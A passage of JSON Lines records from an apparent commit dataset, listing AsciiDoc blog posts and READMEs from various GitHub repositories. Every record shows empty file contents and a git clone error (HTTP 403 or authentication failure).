Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5c-Unboxing-BLUE-iPhone-5c-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-09-20-iPhone-5c-Unboxing-BLUE-iPhone-5c-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80278e9c7937d5323598158401937aca83d3bdf9","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1f6519b03b8a4fc4765c7d936e9806fcc3176cf","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40897898371b994599392a7ad4366edd06825971","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"jughyd\/MVCBookStore,rohitvvv\/MVCBookStore,jughyd\/MVCBookStore,rajmahendra\/MVCBookStore,rajmahendra\/MVCBookStore,jughyd\/MVCBookStore,jbuddha\/MVCBookStore,jbuddha\/MVCBookStore,rohitvvv\/MVCBookStore,jbuddha\/MVCBookStore,rajmahendra\/MVCBookStore,rohitvvv\/MVCBookStore","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohitvvv\/MVCBookStore.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"680514a3eefdd9d6518921f430f41e7f92876ede","subject":"Update 2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","message":"Update 2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","new_file":"_posts\/2015-03-27-Pneumonoultramicroscopicsilicovolcanoconiosis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee62768d9412a69cc9b077919030b4bf525b291a","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9401feb077e11080b9723d2c27b7207548fd08f4","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e95f3865d197831c3fa72a18b840b2327fa3076","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22ced1464d42aa22eb229ea96d8c35ea4498582b","subject":"up website","message":"up website\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4075ee99869259082fe7ae167420a22f2a0f540b","subject":"Update 2015-02-24-change-2.adoc","message":"Update 2015-02-24-change-2.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-2.adoc","new_file":"_posts\/2015-02-24-change-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038b31d5a835d62f88d47d183918dc114a6d8350","subject":"Update 2015-12-11-HubPress.adoc","message":"Update 2015-12-11-HubPress.adoc","repos":"saiisai\/saiisai.github.io,saiisai\/saiisai.github.io,saiisai\/saiisai.github.io","old_file":"_posts\/2015-12-11-HubPress.adoc","new_file":"_posts\/2015-12-11-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/saiisai\/saiisai.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4b305f12eb9bfc0abcc70d2c072b5e5dbb8b8b6","subject":"Update 2015-11-25-Markdown.adoc","message":"Update 2015-11-25-Markdown.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-11-25-Markdown.adoc","new_file":"_posts\/2015-11-25-Markdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b06b5f80ae9da0c3c6b7e82a3efa64c21b4744a","subject":"Update 2015-11-26-AsciiDoc.adoc","message":"Update 2015-11-26-AsciiDoc.adoc","repos":"jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io,jakkypan\/jakkypan.github.io","old_file":"_posts\/2015-11-26-AsciiDoc.adoc","new_file":"_posts\/2015-11-26-AsciiDoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jakkypan\/jakkypan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cadaf104b9edd16445723d3524094b8a83c8c0b","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"560c8f68b256c3a2556c846ec21c2a2b67a5e2a0","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e712ecbb9f7db35bda166777a153ab8643efd72e","subject":"y2b create post Belkin AV360 Mini DisplayPort Converter Unboxing \\u0026 Overview","message":"y2b create post Belkin AV360 Mini DisplayPort Converter Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-14-Belkin-AV360-Mini-DisplayPort-Converter-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-14-Belkin-AV360-Mini-DisplayPort-Converter-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66c5a6fe9d629b7643ed1ca87c52070a5ecd0d97","subject":"Update 2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","message":"Update 2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"371d988719b36a702c5ebf6b6764601ff09053e7","subject":"Update 2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","message":"Update 2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0371bd0832d90c5e7689fd43d65a7119c9be65b","subject":"CI init","message":"CI init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"CI.adoc","new_file":"CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4e026cf15c9e88e740d4ff9966df9539fa05da3","subject":"Added readme","message":"Added readme\n","repos":"FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,FTSRG\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples","old_file":"iot-demo\/README.asciidoc","new_file":"iot-demo\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/FTSRG\/viatra-cep-examples.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f549c70f012396e1bc22c97d2583bc6167596ff8","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53b06cd744aab2b53c1fd38e92bad3b6c38439ab","subject":"Added some documentation","message":"Added some documentation\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e462a52348f55ff93f352b9dab8eefa1fb72621","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"johnhaddon\/gaffer,johnhaddon\/gaffer,paulondc\/gaffer,andrewkaufman\/gaffer,davidsminor\/gaffer,davidsminor\/gaffer,chippey\/gaffer,ImageEngine\/gaffer,appleseedhq\/gaffer,hradec\/gaffer,davidsminor\/gaffer,ImageEngine\/gaffer,cedriclaunay\/gaffer,cedriclaunay\/gaffer,GafferHQ\/gaffer,johnhaddon\/gaffer,andrewkaufman\/gaffer,lucienfostier\/gaffer,boberfly\/gaffer,boberfly\/gaffer,cedriclaunay\/gaffer,ivanimanishi\/gaffer,goddardl\/gaffer,ivanimanishi\/gaffer,GafferHQ\/gaffer,ImageEngine\/gaffer,GafferHQ\/gaffer,ivanimanishi\/gaffer,lucienfostier\/gaffer,chippey\/gaffer,andrewkaufman\/gaffer,boberfly\/gaffer,appleseedhq\/gaffer,davidsminor\/gaffer,ImageEngine\/gaffer,hradec\/gaffer,johnhaddon\/gaffer,lucienfostier\/gaffer,GafferHQ\/gaffer,goddardl\/gaffer,boberfly\/gaffer,paulondc\/gaffer,paulondc\/gaffer,hradec\/gaffer,hradec\/gaffer,lucienfostier\/gaffer,chippey\/gaffer,chippey\/gaffer,paulondc\/gaffer,ivanimanishi\/gaffer,johnhaddon\/gaffer,andrewkaufman\/gaffer,appleseedhq\/gaffer,goddardl\/gaffer,GafferHQ\/gaffer,appleseedhq\/gaffer,andrewkaufman\/gaffer,cedriclaunay\/gaffer,hradec\/gaffer,goddardl\/gaffer","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GafferHQ\/gaffer.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"526683e8770479e697a1194637647a098f60f9ef","subject":"first shot of a doc","message":"first shot of a doc\n","repos":"nlalevee\/jst","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nlalevee\/jst.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa0b30fae218561f532548b6695a28f5e3d291ef","subject":"y2b create post New Custom XBOX 360 Controllers!","message":"y2b create post New Custom XBOX 360 Controllers!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-24-New-Custom-XBOX-360-Controllers.adoc","new_file":"_posts\/2013-09-24-New-Custom-XBOX-360-Controllers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cbf41e4e053373c3c8cbd0c168b9dd6e0ca53a0","subject":"Update 2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","message":"Update 2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","new_file":"_posts\/2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58881452ec3cad293cd019c882ba57204aa283dc","subject":"Create do-contribution-file-es.adoc","message":"Create do-contribution-file-es.adoc\n\nSpanish translation for do-contribution-file.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-contribution-file-es.adoc","new_file":"src\/do\/do-contribution-file-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9526ddbf7cb79af6823b364581a3ab662e13ae45","subject":"Fixed a formatting error","message":"Fixed a formatting error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0dc3e9cb77db943c17be90ca067936826c1ca92","subject":"Update 2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","message":"Update 2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","new_file":"_posts\/2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24cda762f480591efb62014c1f5347cd9ca47f21","subject":"Update 2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","message":"Update 2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","new_file":"_posts\/2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af2f8f6d65fd2cc58c108ca909e381cc5b052c19","subject":"cleaning up words (thx @tiffanyfj)","message":"cleaning up words (thx @tiffanyfj)\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d141cb27e8c0498186b780573280b633c007657","subject":"Update 2016-06-29-New-post.adoc","message":"Update 2016-06-29-New-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-29-New-post.adoc","new_file":"_posts\/2016-06-29-New-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388cb19180252cc6506e4f0ee460ddfd1cac05da","subject":"Document scheduled taks configuration","message":"Document scheduled taks configuration\n","repos":"savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast","old_file":"docs\/cronjob.adoc","new_file":"docs\/cronjob.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8f997c84aeeb2b0aedc185c205bceea5f901893c","subject":"Added start of TUF\/UPTANE docs","message":"Added start of TUF\/UPTANE docs\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/tuf-uptane.adoc","new_file":"docs\/tuf-uptane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"58d4dc9a643979a14e3501b8decd2ba292bc764b","subject":"Deleted _posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Deleted _posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdff60b01d92fec5f59d718721ea3d4e3edb9b2a","subject":"Update 2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","message":"Update 2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","new_file":"_posts\/2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fef594b262986e59956083969b4a1f3ebfed5f99","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-docker,gravitee-io\/gravitee-docker","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cb224652ecd6c0f75d1e380a5b2618f78f2dbe6","subject":"[ci skip] add contributing guidelines","message":"[ci skip] add contributing guidelines\n","repos":"marcosbarbero\/spring-cloud-starter-zuul-ratelimit,marcosbarbero\/spring-cloud-zuul-ratelimit,marcosbarbero\/spring-cloud-zuul-ratelimit","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcosbarbero\/spring-cloud-starter-zuul-ratelimit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2cd5193330819daf9d42039a2eed02c96b3e1c","subject":"Update 2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","message":"Update 2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","new_file":"_posts\/2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ff2b5dc7e78deeb991d88db07b29cdd5a0fc7d","subject":"Update 2017-09-22-Limited-Internet.adoc","message":"Update 2017-09-22-Limited-Internet.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-Limited-Internet.adoc","new_file":"_posts\/2017-09-22-Limited-Internet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ac460563f1ba3bf9b5011a27100d44a5100b41b","subject":"Make 'Filter' look more code-like","message":"Make 'Filter' look more code-like","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"docs\/src\/docs\/asciidoc\/guides\/rest.adoc","new_file":"docs\/src\/docs\/asciidoc\/guides\/rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01f9388239c7da01627ff2b5a204faf14aa414f","subject":"Update 2016-04-11-Home.adoc","message":"Update 2016-04-11-Home.adoc","repos":"yahussain\/yahussain.github.io,yahussain\/yahussain.github.io,yahussain\/yahussain.github.io,yahussain\/yahussain.github.io","old_file":"_posts\/2016-04-11-Home.adoc","new_file":"_posts\/2016-04-11-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yahussain\/yahussain.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aead1468753803ea0abbfd1a7a53b858cb71997","subject":"Update 2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","message":"Update 